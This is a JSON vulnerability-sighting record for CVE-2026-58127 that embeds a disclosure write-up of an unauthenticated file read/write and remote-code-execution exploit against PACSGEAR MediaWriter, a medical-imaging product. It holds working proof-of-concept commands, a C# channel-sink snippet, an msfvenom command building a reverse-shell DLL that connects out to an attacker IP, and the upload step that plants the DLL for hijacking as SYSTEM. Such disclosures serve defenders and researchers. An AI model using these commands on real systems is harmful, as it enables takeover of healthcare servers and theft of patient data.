{"vulnerability": "CVE-2026-58127", "sightings": [{"uuid": "5a874b21-1a6e-4ece-aa9a-253b0f59c9e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58127", "type": "seen", "source": "https://gist.github.com/VAMorales/dc679ecab30b7045fa07bf3249a034d8", "content": "# 1. Exploit Title: PACSGEAR MediaWriter - Unauthenticated Arbitrary File Read/Write + RCE via .NET Remoting\n## Disclosure Date: 07/01/2026\n## CVE ID: [CVE-2026-58127](https://www.cve.org/cverecord?id=CVE-2026-58127)\n## Exploit Authors: Victor A. Morales and Jan A. Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://www.hyland.com/en/solutions/products/pacsgear\n## Known Affected Versions: 5.2.1\n\n### Description\nPACSGear MediaWriter exposes on all interfaces a .NET Remoting service on port 9000 registered by the DLL file PacsgearMediaServerEngine.dll. The RegisterWellKnownServiceType function is used to register the .NET Remoting TCP channel for the service configured. The registered ObjectURI are RemoteObj and UIRemoteObj. By modifying the Proof of Concept of an object unmarshalling technique discovered by researchers of Code-White, implementing the .NET WebClient class method to read/write internal files and using a custom channel sink to force the connection to the correct host and port, arbitrary file read can be achieved to leak the contents of internal system files. This exploitation only requires the knowledge of a valid ObjectURI, which is default across all instances and does not require authentication.\n\nTo achieve RCE, it was observed that the executable PacsgearMediaWriterService.exe, running as NT Authority\\SYSTEM, attempts to load multiple missing dynamic-link libraries file system paths (e.g. CRYPTSP.DLL,CRYPTBASE.DLL) when started, resulting in DLL hijacking oportunities when combined with the .NET Remoting AFR primitive.\n\n### Proof-of-Concept\n\n`.\\RemotingClient_MBRO.exe tcp://:9000/RemoteObj C:\\Windows\\win.ini`\n`.\\RemotingClient_MBRO.exe tcp://:9000/UIRemoteObj C:\\Windows\\win.ini`\n\nSnippet of the custom channel fix code:\n\n```csharp\ninternal class ChannelUriFixingClientChannelSinkProvider : IClientChannelSinkProvider\n    {\n        private readonly string publicHost;\n        private readonly int publicPort;\n\n        public IClientChannelSinkProvider Next { get; set; }\n\n        public ChannelUriFixingClientChannelSinkProvider(Uri objUrl)\n        {\n            if (objUrl == null) throw new ArgumentNullException(nameof(objUrl));\n\n            this.publicHost = objUrl.Host;\n            this.publicPort = objUrl.Port;\n        }\n    }\n```\n\nMetasploit was used to generate a malicious DLL to achieve remote code execution.\n\n`msfvenom -p windows/shell_reverse_tcp LHOST=192.168.179.130 LPORT=8443 -f dll -o cryptbase.dll`\n\nArbitrary file write is performed to upload the malicious dynamic-link library. The files were transferred to the remote server at `C:\\Program Files (x86)\\Pacsgear\\MediaWriter\\Service\\cryptbase.dll`.\n\n`.\\RemoteClient_MBRO.exe --put tcp://192.168.179.137:9000/RemoteObj .\\cryptbase.dll \"C:\\Program Files (x86)\\PACSGEAR\\MediaWriter\\Service\\cryptbase.dll\"`\n\nExploitation requires a restart of the affected service. Based on the privilege level of the account, this may be accomplished by directly restarting the service, rebooting the system, or relying on an automatic restart triggered by a service failure. These tasks cannot be performed by a low-privileged user.\n\nAfter restarting the PacsgearMediaWriterService.exe service, which attempts to load the dynamic-link library cryptbase.dll, the malicious cryptbase.dll is triggered, causing the remote host to connect to an attacker-controlled server and achieve RCE as the privileged NT Authority\\SYSTEM account.", "creation_timestamp": "2026-07-01T12:36:40.782427Z"}]}